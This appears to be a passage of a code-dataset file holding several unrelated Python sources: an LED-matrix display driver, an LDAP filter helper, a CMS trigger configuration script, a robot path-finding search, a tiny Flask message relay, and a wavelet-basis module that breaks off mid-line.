Use of \\\"horizontal\\\" will be removed entirely beginning \"\n                \"v1.0.0\")\n            deprecation(msg)\n            self._correction_angle = 0\n        else:\n            self._correction_angle = block_orientation\n\n        self.cascaded = cascaded or (width * height) // 64\n        self._offsets = [(y * self._w) + x\n                         for y in range(self._h - 8, -8, -8)\n                         for x in range(self._w - 8, -8, -8)]\n        self._rows = list(range(8))\n\n        self.data([self._const.SCANLIMIT, 7] * self.cascaded)\n        self.data([self._const.DECODEMODE, 0] * self.cascaded)\n        self.data([self._const.DISPLAYTEST, 0] * self.cascaded)\n\n        self.contrast(0x70)\n        self.clear()\n        self.show()\n\n    def preprocess(self, image):\n        \"\"\"\n        Performs the inherited behaviour (if any), and if the LED matrix\n        orientation is declared to need correction, each 8x8 block of pixels\n        is rotated 90° clockwise or counter-clockwise.\n        \"\"\"\n        image = super(max7219, self).preprocess(image)\n\n        if self._correction_angle != 0:\n            image = image.copy()\n            for y in range(0, self._h, 8):\n                for x in range(0, self._w, 8):\n                    box = (x, y, x + 8, y + 8)\n                    rotated_block = image.crop(box).rotate(self._correction_angle)\n                    image.paste(rotated_block, box)\n\n        return image\n\n    def display(self, image):\n        \"\"\"\n        Takes a 1-bit :py:mod:`PIL.Image` and dumps it to the LED matrix display\n        via the MAX7219 serializers.\n        \"\"\"\n        assert(image.mode == self.mode)\n        assert(image.size == self.size)\n\n        image = self.preprocess(image)\n\n        i = 0\n        d0 = self._const.DIGIT_0\n        step = 2 * self.cascaded\n        offsets = self._offsets\n        rows = self._rows\n\n        buf = bytearray(8 * step)\n        pix = list(image.getdata())\n\n        for digit in range(8):\n            for daisychained_device in offsets:\n                byte = 0\n                idx = daisychained_device + digit\n                for y in rows:\n                    if pix[idx] > 0:\n                        byte |= 1 << y\n                    idx += self._w\n\n                buf[i] = digit + d0\n                buf[i + 1] = byte\n                i += 2\n\n        buf = list(buf)\n        for i in range(0, len(buf), step):\n            self.data(buf[i:i + step])\n\n    def contrast(self, value):\n        \"\"\"\n        Sets the LED intensity to the desired level, in the range 0-255.\n\n        :param value: Desired contrast level in the range of 0-255.\n        :type value: int\n        \"\"\"\n        assert(0 <= value <= 255)\n        self.data([self._const.INTENSITY, value >> 4] * self.cascaded)\n\n    def show(self):\n        \"\"\"\n        Sets the display mode ON, waking the device out of a prior\n        low-power sleep mode.\n        \"\"\"\n        self.data([self._const.SHUTDOWN, 1] * self.cascaded)\n\n    def hide(self):\n        \"\"\"\n        Switches the display mode OFF, putting the device in low-power\n        sleep mode.\n        \"\"\"\n        self.data([self._const.SHUTDOWN, 0] * self.cascaded)\n\n\nclass ws2812(device):\n    \"\"\"\n    Encapsulates the serial interface to a series of RGB neopixels\n    daisy-chained together with WS281x chips. On creation, the array is\n    initialized with the correct number of cascaded devices. Further control\n    commands can then be called to affect the brightness and other settings.\n\n    :param dma_interface: The WS2812 interface to write to (usually omit this\n        parameter and it will default to the correct value - it is only needed\n        for testing whereby a mock implementation is supplied)\n    :param width: The number of pixels laid out horizontally\n    :type width: int\n    :param height: The number of pixels laid out vertically\n    :type height: int\n    :param cascaded: The number of pixels in a single strip - if supplied, this\n        will override ``width`` and ``height``.\n    :type cascaded: int\n    :param rotate: Whether the device dimensions should be rotated in-situ:\n        A value of: 0=0°, 1=90°, 2=180°, 3=270°. 
If not supplied, zero is\n assumed.\n :type rotate: int\n :param mapping: An (optional) array of integer values that translate the\n pixel to physical offsets. If supplied, should be the same size as\n ``width * height``\n :type mapping: int[]\n\n .. versionadded:: 0.4.0\n \"\"\"\n def __init__(self, dma_interface=None, width=8, height=4, cascaded=None,\n rotate=0, mapping=None, **kwargs):\n super(ws2812, self).__init__(const=None, serial_interface=noop)\n\n # Derive (override) the width and height if a cascaded param supplied\n if cascaded is not None:\n width = cascaded\n height = 1\n\n self.cascaded = width * height\n self.capabilities(width, height, rotate, mode=\"RGB\")\n self._mapping = list(mapping or range(self.cascaded))\n assert(self.cascaded == len(self._mapping))\n self._ws2812 = dma_interface or self.__ws2812__()\n self._ws2812.init(width * height)\n\n self.contrast(0x70)\n self.clear()\n self.show()\n\n def __ws2812__(self):\n import ws2812\n return ws2812\n\n def display(self, image):\n \"\"\"\n Takes a 24-bit RGB :py:mod:`PIL.Image` and dumps it to the daisy-chained\n WS2812 neopixels.\n \"\"\"\n assert(image.mode == self.mode)\n assert(image.size == self.size)\n\n ws = self._ws2812\n m = self._mapping\n for idx, (r, g, b) in enumerate(image.getdata()):\n ws.setPixelColor(m[idx], r, g, b)\n\n ws.show()\n\n def show(self):\n \"\"\"\n Not supported\n \"\"\"\n pass\n\n def hide(self):\n \"\"\"\n Not supported\n \"\"\"\n pass\n\n def contrast(self, value):\n \"\"\"\n Sets the LED intensity to the desired level, in the range 0-255.\n\n :param level: Desired contrast level in the range of 0-255.\n :type level: int\n \"\"\"\n assert(0 <= value <= 255)\n ws = self._ws2812\n ws.setBrightness(value / 255.0)\n ws.show()\n\n def cleanup(self):\n \"\"\"\n Attempt to reset the device & switching it off prior to exiting the\n python process.\n \"\"\"\n super(ws2812, self).cleanup()\n self._ws2812.terminate()\n\n\n# Alias for ws2812\nneopixel = ws2812\n\n# 8x8 Unicorn HAT has a 'snake-like' layout, so this translation\n# mapper linearizes that arrangement into a 'scan-like' layout.\nUNICORN_HAT = [\n 7, 6, 5, 4, 3, 2, 1, 0,\n 8, 9, 10, 11, 12, 13, 14, 15,\n 23, 22, 21, 20, 19, 18, 17, 16,\n 24, 25, 26, 27, 28, 29, 30, 31,\n 39, 38, 37, 36, 35, 34, 33, 32,\n 40, 41, 42, 43, 44, 45, 46, 47,\n 55, 54, 53, 52, 51, 50, 49, 48,\n 56, 57, 58, 59, 60, 61, 62, 63\n]\n\n\nclass apa102(device):\n \"\"\"\n Encapsulates the serial interface to a series of 'next-gen' RGB neopixels\n daisy-chained together with APA102 chips. On creation, the array is\n initialized with the correct number of cascaded devices. Further control\n commands can then be called to affect the brightness and other settings.\n\n Note that the brightness of individual pixels can be set by altering the\n alpha channel of the RGBA image that is being displayed.\n\n :param serial_interface: The serial interface to write to (usually omit this\n parameter and it will default to the correct value - it is only needed\n for testing whereby a mock implementation is supplied)\n :param width: The number of pixels laid out horizontally\n :type width: int\n :param height: The number of pixels laid out vertically\n :type width: int\n :param cascaded: The number of pixels in a single strip - if supplied, this\n will override ``width`` and ``height``.\n :type width: int\n :param rotate: Whether the device dimenstions should be rotated in-situ:\n A value of: 0=0°, 1=90°, 2=180°, 3=270°. 
If not supplied, zero is\n assumed.\n :type rotate: int\n :param mapping: An (optional) array of integer values that translate the\n pixel to physical offsets. If supplied, should be the same size as\n ``width * height``\n :type mapping: int[]\n\n .. versionadded:: 0.9.0\n \"\"\"\n def __init__(self, serial_interface=None, width=8, height=1, cascaded=None,\n rotate=0, mapping=None, **kwargs):\n super(apa102, self).__init__(luma.core.const.common, serial_interface or self.__bitbang__())\n\n # Derive (override) the width and height if a cascaded param supplied\n if cascaded is not None:\n width = cascaded\n height = 1\n\n self.cascaded = width * height\n self.capabilities(width, height, rotate, mode=\"RGBA\")\n self._mapping = list(mapping or range(self.cascaded))\n assert(self.cascaded == len(self._mapping))\n self._last_image = None\n\n self.contrast(0x70)\n self.clear()\n self.show()\n\n def __bitbang__(self):\n from luma.core.interface.serial import bitbang\n return bitbang(SCLK=24, SDA=23)\n\n def display(self, image):\n \"\"\"\n Takes a 32-bit RGBA :py:mod:`PIL.Image` and dumps it to the daisy-chained\n APA102 neopixels. If a pixel is not fully opaque, the alpha channel\n value is used to set the brightness of the respective RGB LED.\n \"\"\"\n assert(image.mode == self.mode)\n assert(image.size == self.size)\n self._last_image = image.copy()\n\n # Send zeros to reset, then pixel values then zeros at end\n sz = image.width * image.height * 4\n buf = bytearray(sz * 3)\n\n m = self._mapping\n for idx, (r, g, b, a) in enumerate(image.getdata()):\n offset = sz + m[idx] * 4\n brightness = (a >> 4) if a != 0xFF else self._brightness\n buf[offset] = (0xE0 | brightness)\n buf[offset + 1] = b\n buf[offset + 2] = g\n buf[offset + 3] = r\n\n self._serial_interface.data(list(buf))\n\n def show(self):\n \"\"\"\n Not supported\n \"\"\"\n pass\n\n def hide(self):\n \"\"\"\n Not supported\n \"\"\"\n pass\n\n def contrast(self, value):\n \"\"\"\n Sets the LED intensity to the desired level, in the range 0-255.\n\n :param level: Desired contrast level in the range of 0-255.\n :type level: int\n \"\"\"\n assert(0 <= value <= 255)\n self._brightness = value >> 4\n if self._last_image is not None:\n self.display(self._last_image)\n","sub_path":"luma/led_matrix/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":13621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300007964","text":"from classes.ldapfilter import LdapFilter\n\n\nclass LdapPersonHints(object):\n def __init__(self):\n self.hints = {}\n return\n\n def add(self,hints):\n self.hints.update(hints)\n return\n\n def filters(self):\n f_list = []\n for hint in self.hints:\n f = LdapFilter()\n f.add(hint,self.hints[hint])\n f_list.append(f)\n return f_list\n\n def filter_strings(self):\n f_strings = []\n f_list = self.filters()\n for f in f_list:\n f_str = str(f)\n f_strings.append(f_str)\n return f_strings\n","sub_path":"classes/ldappersonhints.py","file_name":"ldappersonhints.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"647840492","text":"\nimport FWCore.ParameterSet.Config as cms\n\n# customize to use upgrade L1 emulation \n\nfrom L1Trigger.Configuration.L1Trigger_custom import customiseL1Menu\n\n# customization of run L1 emulator for 2015 run configuration\ndef customiseSimL1EmulatorForPostLS1(process):\n #print \"INFO: Customising L1T emulator for 2015 run 
configuration\"\n #print \"INFO: Customize the L1 menu\"\n # the following line will break HLT if HLT menu is not updated with the corresponding menu\n process=customiseL1Menu(process)\n #print \"INFO: loading RCT LUTs\"\n process.load(\"L1Trigger.L1TCalorimeter.caloStage1RCTLuts_cff\")\n if hasattr(process,'L1simulation_step'):\n #print \"INFO: Removing GCT from simulation and adding new Stage 1\"\n process.load('L1Trigger.L1TCalorimeter.caloStage1Params_cfi')\n process.load('L1Trigger.L1TCalorimeter.L1TCaloStage1_cff')\n process.L1simulation_step.replace(process.simGctDigis,process.L1TCaloStage1)\n process.rctUpgradeFormatDigis.regionTag = cms.InputTag(\"simRctDigis\")\n process.rctUpgradeFormatDigis.emTag = cms.InputTag(\"simRctDigis\")\n #print \"New L1 simulation step is:\", process.L1simulation_step\n process.simGtDigis.GmtInputTag = 'simGmtDigis'\n process.simGtDigis.GctInputTag = 'caloStage1LegacyFormatDigis'\n process.simGtDigis.TechnicalTriggersInputTags = cms.VInputTag( )\n process.gctDigiToRaw.gctInputLabel = 'caloStage1LegacyFormatDigis'\n return process\n\n# #\n# # Plan B: (Not Needed if packing/unpacking of Stage 1 calo via legacy formats and GCT packer works)\n# #\n# process.digi2raw_step.remove(process.gctDigiToRaw)\n# \n# # Carry forward legacy format digis for now (keep rest of workflow working)\n# alist=['RAWSIM','RAWDEBUG','FEVTDEBUG','FEVTDEBUGHLT','GENRAW','RAWSIMHLT','FEVT']\n# for a in alist:\n# b=a+'output'\n# if hasattr(process,b):\n# getattr(process,b).outputCommands.append('keep *_caloStage1LegacyFormatDigis_*_*')\n# print \"INFO: keeping L1T legacy format digis in event.\"\n# \n# blist=['l1extraParticles','recoL1ExtraParticles','hltL1ExtraParticles','dqmL1ExtraParticles']\n# for b in blist:\n# if hasattr(process,b):\n# print \"INFO: customizing \", b, \"to use simulated legacy formats, without packing/unpacking\"\n# getattr(process, b).etTotalSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).nonIsolatedEmSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"nonIsoEm\")\n# getattr(process, b).etMissSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).htMissSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).forwardJetSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"forJets\")\n# getattr(process, b).centralJetSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"cenJets\")\n# getattr(process, b).tauJetSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"tauJets\")\n# getattr(process, b).isolatedEmSource = cms.InputTag(\"caloStage1LegacyFormatDigis\",\"isoEm\")\n# getattr(process, b).etHadSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).hfRingEtSumsSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n# getattr(process, b).hfRingBitCountsSource = cms.InputTag(\"caloStage1LegacyFormatDigis\")\n#\n# # automatic replacements of \"simGctDigis\" instead of \"hltGctDigis\"\n# for module in process.__dict__.itervalues():\n# if isinstance(module, cms._Module):\n# for parameter in module.__dict__.itervalues():\n# if isinstance(parameter, cms.InputTag):\n# if parameter.moduleLabel == 'hltGctDigis':\n# parameter.moduleLabel = \"simGctDigis\"\n\n","sub_path":"L1Trigger/L1TCommon/python/customsPostLS1.py","file_name":"customsPostLS1.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"167344330","text":"import os\nimport re\nfrom copy import deepcopy\nfrom 
pprint import *\nfrom src import ADT\n\n\nclass World:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.grid = [[0 for x in range(height)] for y in range(width)]\n\n def make_walls(self, mylist):\n \"\"\" This function takes a list or coordinates (mylist) and uses them to add walls to self.grid\n Walls are stored as 1, whereas open space is stored as 0\n \"\"\"\n for coord in mylist:\n x = int(coord[0])\n y = int(coord[1])\n self.grid[x][y] = 1\n\n def unmake_walls(self, mylist):\n \"\"\" This function takes a list or coordinates (mylist) and uses them to remove walls from self.grid\n Walls are stored as 1, whereas open space is stored as 0\n \"\"\"\n for coord in mylist:\n x = int(coord[0])\n y = int(coord[1])\n self.grid[x][y] = 0\n\n def is_feasible(self, x, y):\n \"\"\" This function checks that the coordinates x and y refer to a\n coordinate within the grid that is passable (0)\n \"\"\"\n if not (x >= 0 and x < self.width):\n return False\n if not (y >= 0 and y < self.height):\n return False\n return self.grid[x][y] == 0\n\n\nclass Robot:\n def __init__(self, location, goal):\n self.__location = location\n self.__goal = goal\n self.goal_reached = False\n self.path_list = []\n self.smallest = None\n self.smallest_length = None\n\n\n def get_location(self):\n \"\"\" Returns the location of the robot\n \"\"\"\n return self.__location\n\n\n def find_path(self, world, current_path, location):\n \"\"\" This program recursively searches for self.goal\n detailed explanation can be found in the report.\n \"\"\"\n\n # checks that this path isn't longer than the shortest path\n if self.smallest != None:\n if current_path.size >= self.smallest.size:\n return False\n\n # checks that this location is feasible\n if not world.is_feasible(location[0], location[1]):\n return False\n\n # checks whether this location is the goal\n # if it is, information is stored in self.smallest and self.path_length\n if location == self.__goal:\n path_copy = deepcopy(current_path)\n self.smallest = path_copy\n self.path_length = path_copy.size\n print(\"Current smallest:\", self.smallest.size)\n return False\n\n\n east = [location[0], location[1] + 1]\n west = [location[0], location[1] - 1]\n north = [location[0] + 1, location[1]]\n south = [location[0] - 1, location[1]]\n\n # push location to stack, mark location impassable\n current_path.push(location)\n world.make_walls([[location[0], location[1]]])\n\n # call function recursively in all directions\n self.find_path(world, current_path, north)\n self.find_path(world, current_path, south)\n self.find_path(world, current_path, east)\n self.find_path(world, current_path, west)\n\n # pop location from stack, mark location as passable\n current_path.pop()\n world.unmake_walls([location])\n return False\n\n\ndef parse_file(fname):\n \"\"\" This function uses regex to parse the input file for variables to be used in the program\n \"\"\"\n\n # open file\n if os.path.exists(fname):\n buffer = open(fname).read().split(\"\\n\")\n else:\n return \"Error! 
File does not exist\"\n\n    # initialise variables\n    height, width = buffer[0].split(\"x\")\n    walls = []\n    robot_location = None\n    goal = None\n\n    for i in range(1, len(buffer) -1):\n\n        # check for wall coordinates\n        wall_pattern = re.compile(\"\\\\s*w\\\\s*(-{0,1}\\\\d+)\\\\s*,*\\\\s*(-{0,1}\\\\d+)\\\\s*\")\n        if wall_pattern.match(buffer[i]):\n            wall_contents = wall_pattern.match(buffer[i]).groups()\n            walls.append([int(wall_contents[0]), int(wall_contents[1])])\n\n        # check for robot coordinates\n        robot_pattern = re.compile(\"\\\\s*r2d2\\\\s*(-{0,1}\\\\d+)\\\\s*,*\\\\s*(-{0,1}\\\\d+)\\\\s*\")\n        if robot_pattern.match(buffer[i]):\n            robot_contents = robot_pattern.match(buffer[i]).groups()\n            robot_location = [int(robot_contents[0]), int(robot_contents[1])]\n\n        # check for goal coordinates\n        goal_pattern = re.compile(\"\\\\s*goal\\\\s*(-{0,1}\\\\d+)\\\\s*,*\\\\s*(-{0,1}\\\\d+)\\\\s*\")\n        if goal_pattern.match(buffer[i]):\n            goal_contents = goal_pattern.match(buffer[i]).groups()\n            goal = [int(goal_contents[0]), int(goal_contents[1])]\n\n    return int(height), int(width), walls, robot_location, goal\n\n\ndef main():\n    \"\"\" Main function for the program\n    \"\"\"\n    # parse input file, assign contents to variables\n    height, width, walls, robot_location, goal = parse_file(\"world1.txt\")\n\n    # initialise world object\n    world = World(8, 8)\n    world.make_walls(walls)\n\n    # initialise robot object\n    robot = Robot(robot_location, [5, 5])\n    start_path = ADT.LinkedStack()\n    start_path.push(robot_location)\n\n    # print world & robot info\n    print(\"robot_location:\", robot_location)\n    print(\"Goal:\", goal)\n    pprint(world.grid)\n\n    # find shortest path\n    robot.find_path(world, start_path, robot.get_location())\n    if robot.smallest:\n        print(\"Smallest path: \", robot.smallest.print_stack())\n    else:\n        print(\"No path found\")\n\n\nif __name__==\"__main__\":\n    main()\n\n\n","sub_path":"shortest_robot.py","file_name":"shortest_robot.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"78779837","text":"try:\r\n    from flask import Flask\r\nexcept ImportError:\r\n    print(\"install flask to continue\")\r\n    exit()\r\nimport time\r\nimport socket \r\n \r\ndef get_ip_address():\r\n    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n    s.connect((\"8.8.8.8\", 80))\r\n    return s.getsockname()[0] \r\n    \r\napp = Flask(__name__)\r\nglobal data1\r\ndata1=\"\"\r\n\r\n@app.route('/send/<data>')\r\ndef send(data):\r\n    global data1\r\n    data1=data\r\n    data1=time.asctime( time.localtime(time.time()) )+\":\"+data1\r\n    print(data1)\r\n    return \"Hello World\"\r\n\r\n@app.route('/recive')\r\ndef recive():\r\n    global data1\r\n    print(data1)\r\n    return \"\"+data1\r\n\r\nif __name__ == '__main__':\r\n    app.run(host=get_ip_address())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"235627755","text":"import numpy as np\nimport scipy.interpolate\nimport scipy.misc\nimport scipy.special\nimport matplotlib.pyplot as plt\nfrom wavelet import Wavelet \nfrom primal_mra import Primal_MRA\nfrom scipy.linalg import block_diag \nfrom dual_mra import Dual_MRA \nimport examples\nfrom helper_functions import plot_matrix\n\n\n\nclass Wavelet_Basis:\n\t\"\"\"\n\tThe Wavelet_Basis class implements the wavelet basis\n\tarising from using a primal and dual MRA \n\trepresented by the objects Primal_MRA and Dual_MRA\n\trespectively. 
All interaction that is required for solving \n\ta PDE using wavelets can be done by using this class. \n\n\t\"\"\" \n\tdef __init__(self, primal_mra, dual_mra, j, homogeneous = True, Neumann = False):\n\t\tself.primal = primal_mra\n\t\tself.dual = dual_mra\n\t\tself.detail_level = j \n\t\tself.homogeneous = homogeneous\n\t\tself.neumann = Neumann \n\t\tself.initial_completion()\n\t\tself.assemble_basis()\n\n\n\tdef plot(self):\n\n\t\tx = np.linspace(0,1.5,1000) \n\t\tfor ii in range(len(self.basis)):\n\t\t\tplt.plot(x, self.get_function(ii).eval(x), 'b-')\n\t\tplt.show() \n\n\n\tdef add_basis(self, basis):\n\n\t\tself.basis += basis.basis \n\tdef assemble_basis(self):\n\t\tself.basis = []\n\t\tnum_functions = np.shape(self.M_1)[1]\n\n\t\tif self.neumann:\n\t\t\tfor ii in range(2,num_functions-2):\n\t\t\t\tmask = np.transpose(self.M_1[:,ii]) \n\t\t\t\tself.basis.append(Wavelet(self.detail_level, self.primal.degree, mask))\n\n\t\t# elif self.homogeneous:\n\t\t# \tfor ii in range(1,num_functions-1):\n\t\t# \t\tmask = np.transpose(self.M_1[:,ii]) \n\t\t# \t\tself.basis.append(Wavelet(self.detail_level, self.primal.degree, mask))\n\t\n\t\telse:\n\t\t\tfor ii in range(num_functions):\n\t\t\t\tmask = np.transpose(self.M_1[:,ii]) \n\t\t\t\tself.basis.append(Wavelet(self.detail_level, self.primal.degree, mask))\n\n\n\tdef get_function(self, i):\n\t\treturn self.basis[i] \n\n\n\tdef initial_completion(self, return_refinement_matrix = False):\n\t\t\"\"\"This function computes the refinement matrices\n\t\tfor the biorthogonal wavelet system.\n \n Args:\n None\n Returns:\n None \n \"\"\"\n\n\n\t\td = self.primal.degree\n\t\td_t = self.dual.dual_degree \n\n\t\tself.primal.refinement_matrix(self.detail_level)\n\t\tself.dual.refinement_matrix(self.detail_level)\n\n\n\t\tif self.homogeneous:\n\t\t\tM_L = self.primal.M_L[:2*(d-1),:d-1]\n\t\t\tM_R = np.matmul(np.eye(np.shape(M_L)[0])[::-1], np.matmul(M_L, np.eye(np.shape(M_L)[1])[::-1]))\n\t\telse:\n\t\t\tM_L = self.primal.M_L[:2*(d-1),:d-1]\n\t\t\tM_R = np.matmul(np.eye(np.shape(M_L)[0])[::-1], np.matmul(M_L, np.eye(np.shape(M_L)[1])[::-1]))\n\t\tj = self.detail_level \n\n\t\t# Construct matrix A\n\t\tm_A = 2**(j+1) -d + 1 \n\t\tn_A = 2**(j) - d + 1 \n\t\tA = np.zeros((m_A,n_A))\n\n\t\tl_1 = self.primal.l_1 \n\t\tfor i in range(m_A):\n\t\t\tfor k in range(n_A):\n\t\t\t\tif (-1 <= i+1 - 2*(k+1)<= d-1): \n\t\t\t\t\tr = l_1 + 1 + i+1 -2*(k+1)\n\t\t\t\t\ta = 2**(1-d)* scipy.special.binom(d, r + int(np.floor(d/2.)))\n\t\t\t\t\tA[i,k] = a\n\n\t\tl_1 = self.primal.l_1 \n\t\tl_2 = int(np.ceil(d/2.))\n\t\tH_t = np.eye(2**(j+1) - d + 1)\n\n\n\t\t### Factorise matrix A ### \n\n\t\t# Use upper bool to alternate between the two \n\t\t# matrices H\n\n\t\tupper = True \n\t\tii = 1 \n\t\tfor kk in range(1,d+1):\n\t\t\t\n\t\t\tif upper:\n\t\t\t\tn = 1 - ii%2\n\t\t\t\tN = abs(d % 2 - ii %2)\n\t\t\t\tm = (2**(j+1) - d + 1 - n -N)/2\n\t\t\t\tm = int(m) \n\t\t\t\tidx = 2*ii -1 \n\t\t\t\tel1 = A[int(idx/2.),0]\n\t\t\t\tel2 = A[int(idx/2.)+1,0]\n\t\t\t\tU = np.array([[1, - el1/el2],[0,1]])\n\t\t\t\tH = np.eye(2**(j+1) - d + 1)\n\t\t\t\tfor jj in range(0,m):\n\t\t\t\t\tH[n+2*jj:n+2*(jj+1), n+2*jj:n+2*(jj+1)] = U\n\t\t\t\t\n\t\t\tif not upper: \n\t\t\t\tn = 1 - ii % 2\n\t\t\t\tN = abs(d % 2 - ii %2)\n\t\t\t\tm = (2**(j+1) - d + 1 - n -N)/2\n\t\t\t\tm = int(m) \n\t\t\t\tidx = 2*ii \n\t\t\t\tel1 = A[l_2-l_1+1- int(np.floor(idx/2.)),0]\n\t\t\t\tel2 = A[l_2-l_1+1- int(np.floor(idx/2.))-1,0]\n\t\t\t\tL = np.array([[1, 0],[- el1/el2,1]])\n\t\t\t\tH = np.eye(2**(j+1) - d + 
1)\n\t\t\t\tfor jj in range(0,m):\n\t\t\t\t\tH[N+2*jj:N+2*(jj+1), N+2*jj:N+2*(jj+1)] = L\n\t\t\t\tii += 1 \n\n\n\t\t\tupper = not upper\n\n\t\t\tA = np.matmul(H,A)\n\t\t\tH_t = np.matmul(H, H_t)\n\t\t\n\t\tH_hat = block_diag(np.eye(d-1), H_t, np.eye(d-1))\n\n\n\t\t### Create matrix F ###\n\n\t\tF = np.zeros((2**(j+1) -d + 1, 2**j -d + 1))\n\t\toffset = int(np.ceil(d/2.)) -1 \n\t\tmemory = offset\n\t\tfor jj in range(np.shape(F)[1]):\n\t\t\tF[memory, jj] = 1.0\n\n\t\t\tmemory += 2\n\t\tF_hat = np.zeros((2**(j+1)+d-1, 2**j))\n\t\tF_hat[d-1:d-1 + np.shape(F)[0], int(np.ceil(d/2.)) -1:int(np.ceil(d/2.)) -1 + np.shape(F)[1]] = F \n\t\tF_hat[d-1:d-1 + int(np.ceil(d/2.)) -1, 0:int(np.ceil(d/2.)) -1] = np.eye(int(np.ceil(d/2.)) -1)\n\t\tm = d-1 + np.shape(F)[0] - int(np.floor(d/2.))\n\t\tn = int(np.ceil(d/2.)) -1 +np.shape(F)[1]\n\t\tF_hat[m:m+int(np.floor(d/2.)), n:n+int(np.floor(d/2.))] = np.eye(int(np.floor(d/2.))) \n\t\t# F_hat[-int(d/2.)-d+2:-d+2,-int(d/2.):-1] = np.eye(int(d/2.))\n\t\t### Construct matrix P ###\n\n\t\tP = np.eye(2**(j+1)+d-1)\n\t\tm = np.shape(M_L)[0]\n\t\tn = np.shape(M_L)[1]\n\t\tP[0:m, 0:n] = M_L\n\t\tP[-m:, -n:] = M_R \n\t\t\n\n\t\t### Initial completion ### \n\n\t\t\n\t\tif self.dual.homogeneous:\n\t\t\tM_hat_0 = self.dual.M\n\t\t\t# M_hat_0[:,[0,-1]] = 0.0\n\t\t\t# M_hat_0[[0,-1],:] = 0.0\n\t\t\tM_0 = self.primal.M\n\n\t\t\n\t\t\t# M_0[:, [0,-1]] = 0.0\n\t\t\tM_0[[0,-1],:] = 0.0\n\t\telse: \n\t\t\tM_hat_0 = self.dual.M\n\t\t\tM_0 = self.primal.M\n\n\t\tif self.homogeneous:\n\t\t\tM_0[[0,-1],:] = 0.0\n\t\t\tM_0[:, [0,-1]] = 0.0\n\n\t\tM_hat_1 = 2**(-0.5) * np.matmul(P, np.matmul(np.linalg.inv(H_hat), F_hat))\n\t\t\n\t\tG_j1 = 2**0.5 * np.matmul(np.transpose(F_hat), np.matmul(H_hat, np.linalg.inv(P)))\n\t\tself.M_1 = np.matmul((np.eye(2**(j+1)+d -1) - np.matmul(M_0, np.transpose(M_hat_0))), M_hat_1)\n\t\tself.M_t_1 = np.transpose(G_j1)\n\n\t\n\t\t# plot_matrix(np.matmul(np.transpose(self.M_1), self.M_t_1))\n\t\tassert (np.linalg.norm(np.matmul(np.transpose(M_0), M_hat_0)[1:-1,1:-1] - np.eye(np.shape(M_0)[1] -2),2) < 1e-6)\n\t\tassert (np.linalg.norm(np.matmul(np.transpose(self.M_1), self.M_t_1)[1:-1, 1:-1] - np.eye(np.shape(self.M_t_1)[1] -2),2) < 1e-6)\n\n\t\tif return_refinement_matrix:\n\n\t\t\treturn M_0 \n\t\tG = np.matmul(np.transpose(M_0), M_hat_0)\n\t\t# G[abs(G) < 1e-5] = 0.0 \n\t\t# plot_matrix(G)\n\t\t# plot_matrix(np.matmul(np.transpose(M_0)[1:-1,1:-1], self.M_t_1[1:-1, :]))\n\t\t# assert (np.linalg.norm(np.matmul(np.transpose(M_0), self.M_t_1)) <1e-12)\n\t\t# assert (np.linalg.norm(np.matmul(np.transpose(M_hat_0), self.M_1)) <1e-12)\n\n\n\n\tdef refinement_matrices(self, j):\n\t\tself.detail_level = j\n\t\tM_0 = self.initial_completion(return_refinement_matrix = True)\n\t\t\n\t\treturn M_0, self.M_1\n\n\tdef grammian(self, j, primal = True):\n\n\t\tif primal:\n\t\t\tgrammian_primal = self.primal.grammian(j+1)\n\t\t\tM = self.M_1\n\t\t\tgrammian = np.matmul(np.transpose(M), np.matmul(grammian_primal, M))\n\t\t\treturn grammian \n\t\telse:\n\t\t\traise NotImplementedError \n\t\t\n\nif __name__ == \"__main__\":\n\n\td = 4\n\td_t = 6\n\tprimal = Primal_MRA(d, d_t) \n\t# primal.refinement_matrix(4)\n\tdual = Dual_MRA(primal, d_t, homogeneous = False)\n\twavelet_basis = Wavelet_Basis(primal, dual, 5, homogeneous = False)\n\tprint(len(wavelet_basis.basis))\n\tM_t = dual.M\n\tM = primal.M\n\t# wavelet_basis.plot()\n\t# G = np.matmul(np.transpose(M_t), M) \n\t# G[abs(G) < 1e-5] = 0.0\n\t# M_t[abs(M_t) < 1e-5] = 0.0\n\timport matplotlib.pyplot as plt \n\tfrom 
